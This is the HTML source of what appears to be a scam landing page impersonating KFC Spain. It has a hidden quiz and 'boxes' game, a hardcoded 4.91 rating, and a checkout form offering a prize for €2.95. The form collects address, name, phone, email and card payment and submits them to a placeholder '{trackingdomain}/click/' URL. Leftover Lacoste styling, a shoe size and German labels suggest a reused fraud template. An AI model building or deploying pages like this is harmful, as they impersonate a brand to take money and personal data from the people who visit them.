<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="shortcut icon" href="./assets/favicon.ico" />

    <title>KFC España – Sabe a #PolloPollo</title>

    <link rel="stylesheet" href="./assets/intlTelInput.css" />

    <!-- <link rel="stylesheet" href="./assets/loader.css" /> -->
    <link rel="stylesheet" href="./assets/boxes.css" />
    <link rel="stylesheet" href="./assets/main.css" />
    <link rel="stylesheet" href="assets/lacoste_style.css" />

    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />

    <link as="image" href="./assets/flags.png" rel="preload" />
    <link as="image" href="./assets/flags_2x.png" rel="preload" />
  </head>
  <style>
    .bFxMoK {
      position: relative;
      background-color: rgb(223, 0, 0);
    }
    .header__right-cart {
      position: relative;
    }
    .bxaiZl {
      box-sizing: border-box;
      margin: 0px auto;
      max-width: 1472px;
      padding: 0px 16px;
    }
    .jDnGDW {
      width: 100%;
      left: 0px;
      right: 0px;
      background: center center / cover no-repeat transparent;
      padding-top: 4px;
      padding-bottom: 4px;
    }
    .cNztuy {
      box-sizing: border-box;
      background-color: rgb(223, 0, 0);
      color: rgb(255, 255, 255);
      position: relative;
      z-index: 1;
    }

    .bxaiZl {
      box-sizing: border-box;
      margin: 0px auto;
      max-width: 1472px;
      padding: 0px 16px;
    }

    .fOeBHX {
      position: relative;
      z-index: 1;
      background-color: rgb(223, 0, 0);
      padding: 16px 0px;
    }

    .iaSNbG {
      display: flex;
      flex-direction: row;
      -webkit-box-pack: justify;
      justify-content: space-between;
      -webkit-box-align: center;
      align-items: center;
    }

    .eaCPgZ {
      order: 0;
      flex: 0 0 content;
      align-self: auto;
    }

    .GjBa-D {
      min-width: fit-content;
      margin-right: 4px;
    }
    .bxaiZl {
      box-sizing: border-box;
      margin: 0px auto;
      max-width: 1472px;
      padding: 0px 16px;
    }
    .cugrPy {
      display: flex;
      flex-direction: row;
      z-index: 1;
    }

    .cugrPy > li {
      flex: 1 1 0%;
      display: none;
      -webkit-box-pack: center;
      justify-content: center;
      padding: 4px 0px;
      margin: 0px 4px;
      overflow: hidden;
    }
    .cugrPy > li:nth-child(-n + 2) {
      display: flex;
    }
    .main-content {
      padding-top: 0;
    }
    .fmqNnG .sc-1vrq823-0 {
      float: left;
      position: relative;
      top: 1px;
      margin-right: 8px;
    }
    .equRR {
      display: grid;
      gap: 16px;
      grid-template-columns: repeat(4, minmax(0px, 1fr));
    }
    .krCibH {
      background: rgb(165, 23, 22);
    }
    .eWncEq {
      width: auto;
      grid-column-end: span 4;
    }
    .hAokIf {
      display: inline-flex;
      -webkit-box-align: center;
      align-items: center;
      width: fit-content;
      color: inherit;
      opacity: 1;
      text-decoration: none;
      cursor: pointer;
      position: relative;

      font-size: inherit;
      font-weight: inherit;
      padding: 0;
      margin: 0;
      border: none;
      background: transparent;
      border-bottom: 1px solid rgb(255, 255, 255);
      border-radius: 0;
    }
    .krCibH ul,
    .krCibH li {
      margin: 0;
    }
    .krCibH p {
      margin: 0;
    }

    .iBuWKj {
      color: rgb(255, 255, 255);
      font-size: 14px;
      line-height: 20px;
      font-family: SourceSansPro, Arial, sans-serif;
      font-weight: 400;
      letter-spacing: normal;
      display: flex;
      align-items: center;
    }
    .jqWRKP {
      display: flex;
      -webkit-box-pack: center;
      justify-content: center;
      -webkit-box-align: center;
      align-items: center;
      outline: none;
      cursor: pointer;
      border: 2px solid transparent;
      border-radius: 8px;
      background-color: transparent;
      color: rgb(255, 255, 255);
      padding: 8px;
    }

    .dYJqfl svg {
      cursor: inherit;
      width: 16px;
      height: 16px;
      transform: rotate(0deg);
      fill: currentcolor;
    }

    .bPIPio svg {
      cursor: inherit;
      width: 14px;
      height: 14px;
      transform: rotate(0deg);
      fill: rgb(255, 255, 255);
    }
    .hjuTvf {
      display: flex;
      -webkit-box-pack: center;
      justify-content: center;
      -webkit-box-align: center;
      align-items: center;
      border-radius: 50%;
      box-sizing: border-box;
      outline: none;
      cursor: pointer;
      appearance: none;
      padding: 0px;
      position: relative;
      text-decoration: none;
      font-family: SourceSansPro, Arial, sans-serif;
      font-weight: bold;
      font-size: 16px;
      width: 40px;
      height: 40px;
      background: rgb(255, 255, 255);
      border: 2px solid rgb(255, 255, 255);
      color: rgb(39, 36, 34);
    }
    .hHfbMf {
      display: flex;
      -webkit-box-pack: center;
      justify-content: center;
      -webkit-box-align: center;
      align-items: center;
      border-radius: 50%;
      box-sizing: border-box;
      outline: none;
      cursor: pointer;
      appearance: none;
      padding: 0px;
      position: relative;
      text-decoration: none;
      font-family: SourceSansPro, Arial, sans-serif;
      font-weight: bold;
      font-size: 16px;
      width: 40px;
      height: 40px;
      background: rgb(255, 255, 255);
      border: 2px solid rgb(255, 255, 255);
      color: rgb(39, 36, 34);
    }
    .hHfbMf > div {
      display: flex;
      align-items: center;
    }
    .gnnIMZ {
      background: transparent;
      border: none;
    }
    .fJPXFR svg {
      width: 16px;
      height: 16px;
    }
    .TXWLc {
      position: relative;
      max-width: 250px;
      fill: rgb(255, 255, 255);
    }

    .hTBBrA {
      display: flex;
      -webkit-box-align: center;
      align-items: center;
      width: fit-content;
      color: rgb(0, 0, 0);
      opacity: 1;
      text-decoration: none;
      cursor: pointer;
      position: relative;
    }
    .gnnIMZ {
      margin: 0px 8px;
      max-width: 158px;
    }

    .cra-DlM {
      display: block;
      width: 100%;
    }
    .fhQsiV {
      position: relative;
      display: flex;
      -webkit-box-pack: end;
      justify-content: flex-end;
    }

    .cLDtPk {
      background-color: rgb(255, 255, 255);
      border: none;
      padding: 8px;
      cursor: pointer;
    }
    .cLDtPk > div {
      display: flex;
    }
    .cLDtPk svg {
      width: 20px;
      height: 20px;
    }
    .cLDtPk:first-child {
      border-radius: 8px 0px 0px 8px;
    }
    [hidden] {
      display: none;
    }
    .SLjij {
      flex: 1 1 auto;
      min-width: 0px;
      display: flex;
      -webkit-box-align: center;
      align-items: center;
      border-radius: 0px 8px 8px 0px;
      padding: 0px 48px 0px 0px;
      font-size: 16px;
      line-height: 24px;
      background-color: rgb(255, 255, 255);
      margin-left: -1px;
      border: none !important;
    }
    .heflXR svg {
      cursor: inherit;
      width: 24px;
      height: 24px;
      transform: rotate(0deg);
      fill: currentcolor;
    }

    .hTBBrA {
      display: flex;
      -webkit-box-align: center;
      align-items: center;
      width: fit-content;
      color: rgb(0, 0, 0);
      opacity: 1;
      text-decoration: none;
      cursor: pointer;
      position: relative;
    }
    .gnnIMZ {
      margin: 0px 8px;
      max-width: 158px;
    }
    .filpiZ {
      order: 0;
      flex: 1 1 0%;
      align-self: auto;
    }
    .fdglIm {
      margin-right: 16px;
      margin-left: 8px;
    }
    .hSNhff {
      width: 100%;
      background-color: rgb(223, 0, 0);
      position: relative;
      padding: 2px 0px 16px;
      box-sizing: border-box;
    }
    .alza .cart-navtabs:not(.cart-navtabs--sections) {
      background-color: rgb(223, 0, 0);
    }
    .basket-steps .step.done .circle .content:before {
      color: #000;
    }
    .basket-steps .step.current .circle,
    .basket-steps .step.done .circle {
      background-color: rgb(223, 0, 0);
      border-bottom: 1px solid rgb(223, 0, 0);
    }
    .basket-steps .step.current .circle:before,
    .basket-steps .step.done .circle:before {
      background-color: rgb(223, 0, 0);
      border-bottom: 1px solid rgb(223, 0, 0);
    }
    .basket-steps .step.done .circle:after {
      background-color: rgb(223, 0, 0);
      border-bottom: 1px solid rgb(223, 0, 0);
    }
    .basket-steps .step .content {
      color: #000;
    }
    .order-prices .final-price .value {
      color: rgb(223, 0, 0);
    }
    .basket-steps .step.current .title,
    .basket-steps .step.done .title {
      color: rgb(223, 0, 0);
    }
    .btn.countdown,
    .btn.green,
    .collapser.button.countdown,
    .confirmationDialog
      #confirmationDialog
      .dialogButtonsContainer
      .confirm-dialog-button-line
      .countdown.btnx,
    .confirmationDialog
      #confirmationDialog
      .dialogButtonsContainer
      .confirm-dialog-button-line
      .green.btnx,
    .green.collapser.button,
    .green.selectable,
    .selectable.countdown {
      background-color: rgb(223, 0, 0);
    }
   
    .sc-w10r9s-4 .gBJmmA a {
      padding-top: 0;
      border: none;
      background-color: transparent;
    }
    #main_content .answer_btn {
      cursor: pointer;
      background-color: rgb(223, 0, 0);
    }
    .sweet-alert button {
      background-color: rgb(223, 0, 0);
    }
    .sweet-alert button:hover {
      opacity: 0.8;
      background-color: rgb(223, 0, 0);
    }
    .div_img_gift {
      top: 50%;
      transform: translateY(-50%);
    }

    .btn.green:hover {
      opacity: 0.8;
    }

    .header__inner {
      display: flex;
      justify-content: space-between;
      align-items: center;
      height: 100%;
    }
    .header__logo svg {
      color: #105a33;
      fill: #e72734;
      height: 43px;
    }
    .header__cart img {
      width: 25px;
      height: 25px;
      display: block;
    }
    .header__burger img {
      width: 25px;
      height: 25px;
      display: block;
    }
    .header__cart {
      position: relative;
    }
    .header__cart-number {
      position: absolute;
      top: -2px;
      right: -2px;
      font-size: 9px;
      background-color: #292929;
      color: #fff;
      height: 13px;
      width: 13px;
      border-radius: 50%;
      text-align: center;
      line-height: 13px;
    }
    .header__inner {
      display: flex;
    }
    .header__right {
      display: flex;
      align-items: center;
      height: 100%;
    }
    .header__right div > img {
      width: 25px;

      height: 25px;
    }
    .logo-left {
      width: 45px;
      height: 45px;
      margin-left: 15px;
      padding-left: auto;
      padding-right: auto;
    }
    .header__logo {
     align-items: center;
      justify-content: space-between;
      display: flex;
      height: 50px;
    }
    .logo-right {
      width: 40px;
      height: 40px;
      margin-right: 18px;
      margin-top: 0px;
      padding-bottom: 0px;
    }
    
    .header__right div {
      height: 100%;
      padding: 0 14px;
      align-items: center;
      display: flex;
    }
    .header__right div {
      border-right: 0.125rem solid #ccc;
    }
    .header__right div:last-child {
      border: none;
    }
    .header__right div svg {
      width: 25px;
      height: 25px;
    }
    .header__right div svg path {
    }
    .header__right div svg path {
      fill: #c9192e;
    }
    .header__cart {
      position: relative;
    }
    .topnav-cart-qty,
    .topnav-wishlist-qty {
      background: none;
      color: #fefefe;
      font-family: "franklin-gothic-urw-cond", "Arial Narrow", Arial,
        sans-serif;
      font-weight: normal;
      font-size: 0.7rem;
    }
    .topnav-cart-qty {
      border-radius: 15px;
      height: 30px;
      line-height: 30px;
      min-width: 30px;
      display: inline-block;
      padding: 0 0.25em;
      text-align: center;
      margin-top: 0;
      position: absolute;
      top: 50%;
      -webkit-transform: translateY(-100%);
      transform: translateY(-100%);

      color: #000;
      right: 50%;
      margin-right: -30px;
      color: #cb1b2c !important;
      height: 0.4375rem;
    }
    .loader {
      margin: auto;
      margin-bottom: 40px;
    }

    .loader_gif {
      margin: auto;
      width: 270px;
      padding-top: auto;
      padding-bottom: 70px;
      border-radius: 150px;
    }
    
    .loader_container{
      display: flex;
     
      margin-top: auto;
      margin-bottom: auto;
     padding-bottom: 40px; 
    }
    .checkout_header {
      padding-top: 7px;
      padding-bottom: 7px;
      display: none;
      align-items: center;
      border-bottom: 2px solid #e9e9e9;
    }
    .checkImg {
      width: 200px;
      margin: auto;
    }
  </style>
  <body id="mainBody">
    <header class="header_container_1">
      
      <img src="./assets/burger.png" alt="" class="burger">
      
      <img src="./assets/kfc-logo-mobile.svg" alt="" class="logotype">

      <div class="right_bar">
<img src="./assets/face.png" alt="" class="face">
<img src="./assets/bucket.png" alt="" class="bucket">

      </div>

  
    </header>
  

   <div class="loader_container">
     <img
       src="./assets/loader_gif.gif"
       alt=""
       class="loader_gif"
       id=""
     />

   </div>
    

    <section style="display: none" id="main" class="page page__container">
      <main id="mainHero" class="hero">
        <div class="hero__content">
          <div id="mainHeroDescription" class="hero__description">
            <p id="mainProductHeader" class="hero__description-text"></p>
            <p id="mainProductName" class="hero__description-title"></p>
            <p class="hero__price">
              <span id="mainProductOldPrice" class="hero__price-primary"></span>
              <span id="mainProductNewPrice" class="hero__price-sale"></span>
            </p>
          </div>
          
          <p id="mainProductText" class="text"></p>
          <div id="questions"></div>
        </div>
      </main>
      <div class="ratingbox">
        <div class="rating">
          <div class="rat">
            <!-- <h2 id="ratingRr" class="h2rat"></h2> -->
            <!-- <span id="ratingPercent" class="percentrat"></span> -->

            <img class="rating_logo"
              src="./assets/logo.png"
              alt=""
           
            />

            <span id="ratingRecRat" class="recrat">4.91</span>

            <div class="starsbox">
              <div id="stars" class="stars"></div>
              <div class="starstext">4.91</div>
            </div>
          </div>
        </div>
      </div>
      <div id="reviews" class="reviews"></div>
    </section>

    <section style="display: none" id="game">
      <main id="boxes" class="page page__container"></main>
    </section>

    <section style="display: none" id="checkout">
      <div id="checkoutContent">
        <form
          action="https://{trackingdomain}/click/"
          class="page page__container data-checkout-stage"
        >
          <input type="hidden" name="origin" value="{origin}" />
          <input
            id="countryCodeHiddenField"
            type="hidden"
            name="country_code"
          />
          <div class="row shipment-section-m pt-2">
            <div class="col-sm-8 checkout-products pb-lg-3">
              <div class="shipping-section">
                <div class="single-shipping">
                  <div class="card">
                    <div class="card-body shipping-content">
                      <div class="shipping-form">
                        <div class="shipping-address pl-0 pl-lg-3">
                          <div id="checkoutMobileOffer" class="mobile-offer">
                            <div class="card">
                              <div
                                style="
                                  border-bottom: 1px solid rgb(225, 225, 225);
                                  align-items: center;
                                  display: flex;
                                "
                              >
                                <div class="offer-photo">
                                  <img
                                    id="checkoutCurrentPhoto"
                                    src="./assets/box.png"
                                  />
                                </div>
                                <div class="offer-details">
                                  <div
                                    id="checkoutOfferName"
                                    class="offer-name"
                                  >
                                    Name
                                  </div>
                                  <div
                                    id="checkoutOfferSize"
                                    class="offer-name"
                                  >
                                    Size: EU 38
                                  </div>
                                  <div class="price mt-2">
                                    <span
                                      id="checkoutOldPrice"
                                      style="text-decoration: line-through"
                                      >€ 45,54</span
                                    >
                                    <span
                                      id="checkoutNewPrice"
                                      class="!tw-ml-2"
                                      style="font-weight: bold; color: red"
                                      >€ 2,95</span
                                    >
                                  </div>
                                </div>
                              </div>
                            </div>
                          </div>
                          <fieldset
                            class="shipping-method-block"
                            style="border-bottom: 1px solid rgb(225, 225, 225)"
                          >
                            <div class="row">
                              <div class="col-md-4 pl-lg-0">
                                <h3 id="deliveryHeader">Delivery</h3>
                              </div>
                              <div class="col-md-8">
                                <div class="leading-lines shipping-method-list">
                                  <div class="row">
                                    <div class="col-12">
                                      <div class="form-group">
                                        <label
                                          id="cityFieldLabel"
                                          class="form-control-label moveLabel"
                                          for="cityField"
                                          >City</label
                                        >
                                        <input
                                          id="cityField"
                                          type="text"
                                          class="form-control shippingAddressTwo"
                                          name="city"
                                          required
                                        />
                                      </div>
                                    </div>
                                  </div>
                                  <div class="row">
                                    <div class="col-12">
                                      <div class="form-group">
                                        <label
                                          id="addressFieldLabel"
                                          class="form-control-label moveLabel"
                                          for="addressField"
                                          >Address</label
                                        >
                                        <input
                                          id="addressField"
                                          type="text"
                                          class="form-control shippingAddressTwo"
                                          name="address"
                                          required
                                        />
                                      </div>
                                    </div>
                                  </div>
                                  <div class="row">
                                    <div class="col-12">
                                      <div class="form-group">
                                        <label
                                          id="zipFieldLabel"
                                          class="form-control-label moveLabel"
                                          for="zipField"
                                          >Postleitzahl</label
                                        >
                                        <input
                                          id="zipField"
                                          type="text"
                                          class="form-control shippingAddressTwo"
                                          name="zip"
                                          required
                                        />
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </div>
                          </fieldset>
                          <fieldset
                            class="shipping-method-block"
                            style="border-bottom: 1px solid rgb(225, 225, 225)"
                          >
                            <div class="row">
                              <div class="col-md-4 pl-lg-0">
                                <h3 id="paymentHeader">
                                  Zahlungsmöglichkeiten
                                </h3>
                              </div>
                              <div class="col-md-8">
                                <div
                                  class="row leading-lines shipping-method-list"
                                >
                                  <div class="setSelected-Bg">
                                    <div
                                      class="form-check col-9 start-lines p-0 selected"
                                    >
                                      <input
                                        name="online_pay"
                                        type="radio"
                                        class="form-check-input shipping-method-checkbox"
                                        value="001"
                                      />
                                      <label
                                        class="form-check-label shipping-method-option"
                                        for="shippingMethod-001-ade7bec383cacb5d44fcc51ffc"
                                      >
                                        <span
                                          id="paymentMethodLabel"
                                          class="display-name"
                                          >Online mit Karte bezahlen</span
                                        >
                                      </label>
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </div>
                          </fieldset>
                          <fieldset
                            class="shipping-method-block"
                            style="border-bottom: 1px solid rgb(225, 225, 225)"
                          >
                            <div class="row">
                              <div class="col-md-4 pl-lg-0">
                                <h3 id="personalInfoHeader">
                                  Persönliche Informationen
                                </h3>
                              </div>
                              <div class="col-md-8">
                                <div class="leading-lines shipping-method-list">
                                  <div class="row">
                                    <div class="col-12">
                                      <div class="form-group">
                                        <label
                                          id="nameFieldLabel"
                                          class="form-control-label moveLabel"
                                          for="nameField"
                                          >Vorname
                                        </label>
                                        <input
                                          id="nameField"
                                          type="text"
                                          class="form-control shippingAddressTwo"
                                          name="name"
                                          required
                                        />
                                      </div>
                                    </div>
                                  </div>
                                  <div class="row">
                                    <div class="col-12">
                                      <div class="form-group">
                                        <label
                                          id="familyFieldLabel"
                                          class="form-control-label moveLabel"
                                          for="familyField"
                                          >Nachname
                                        </label>
                                        <input
                                          id="familyField"
                                          type="text"
                                          class="form-control shippingAddressTwo"
                                          name="family"
                                          required
                                        />
                                      </div>
                                    </div>
                                  </div>
                                  <div class="row">
                                    <div class="col-12">
                                      <div class="form-group">
                                        <label
                                          id="phoneFieldLabel"
                                          class="form-control-label moveLabel"
                                          for="phoneField"
                                          >Rufnummer
                                        </label>
                                        <input
                                          id="phoneField"
                                          type="tel"
                                          class="form-control shippingAddressTwo"
                                          name="phone"
                                          required
                                        />
                                      </div>
                                    </div>
                                  </div>
                                  <div class="row">
                                    <div class="col-12">
                                      <div class="form-group">
                                        <label
                                          id="emailFieldLabel"
                                          class="form-control-label moveLabel"
                                          for="emailField"
                                          >E-Mail
                                        </label>
                                        <input
                                          id="emailField"
                                          type="email"
                                          class="form-control shippingAddressTwo"
                                          name="email"
                                          required
                                        />
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </div>
                          </fieldset>
                          <div class="row mx-0 mb-3">
                            <div
                              class="col-12 next-step-button ml-lg-auto px-lg-0"
                            >
                              <div class="pt-lg-4 ml-lg-3">
                                <button
                                  id="submitButton"
                                  type="submit"
                                  class="btn btn-primary btn-block submit-shipping"
                                
                                style="font-weight: 900;"  >
                                  Go to checkout
                                </button>
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
            <div class="col-sm-4 shipment-order-summary">
              <div id="checkoutPcOffer" class="non-mobile-offer"></div>
              <div class="card">
                <div class="card-header">
                  <h2 id="checkoutTotalTitle" class="card-header-custom mb-2">
                    Zusammenfassung des Beschlusses
                  </h2>
                  <div class="card-body order-total-summary">
                    <div class="row leading-lines shipping-item">
                      <div class="col-6 start-lines">
                        <p class="order-receipt-label">
                          <span id="checkoutTotalSubtotalTitle"
                            >Wert der Bestellung</span
                          >
                        </p>
                      </div>
                      <div class="col-6 end-lines">
                        <p class="text-right">
                          <span
                            id="checkoutTotalSubtotalAmount"
                            class="shipping-total-cost"
                            >€ 2,95</span
                          >
                        </p>
                      </div>
                    </div>
                    <div class="row leading-lines shipping-item">
                      <div class="col-6 start-lines">
                        <p class="order-receipt-label">
                          <span id="checkoutTotalDeliveryTitle">Lieferung</span>
                        </p>
                      </div>
                      <div class="col-6 end-lines">
                        <p class="text-right">
                          <span
                            id="checkoutTotalDeliveryAmount"
                            class="shipping-total-cost"
                            >€ 0,00</span
                          >
                        </p>
                      </div>
                    </div>
                    <div class="row leading-lines">
                      <div class="col-6 start-lines">
                        <p class="order-receipt-label boldTitle">
                          <span id="checkoutTotalTotalTitle">Insgesamt</span>
                        </p>
                      </div>
                      <div class="col-6 end-lines">
                        <p class="text-right">
                          <span
                            id="checkoutTotalTotalAmount"
                            class="grand-total-sum"
                            >€ 2,95</span
                          >
                        </p>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </form>
      </div>
    </section>
    <!-- <div>
  <img src="./assets/footer_img.png" alt="">
</div> -->

    <footer>
      <script
        src="https://cdnjs.cloudflare.com/ajax/libs/Swiper/6.8.4/swiper-bundle.min.js"
        integrity="sha512-BABFxitBmYt44N6n1NIJkGOsNaVaCs/GpaJwDktrfkWIBFnMD6p5l9m+Kc/4SLJSJ4mYf+cstX98NYrsG/M9ag=="
        crossorigin="anonymous"
        referrerpolicy="no-referrer"
      ></script>
      <script src="./assets/intlTelInput.min.js"></script>
      <script src="./assets/imask.js"></script>
      <script src="./assets/config.js"></script>
      <script src="./assets/checkout.js"></script>
      <script src="./assets/game.js"></script>
      <script src="./assets/questions.js"></script>
      <script src="./assets/main.js"></script>
    </footer>
  </body>
</html>
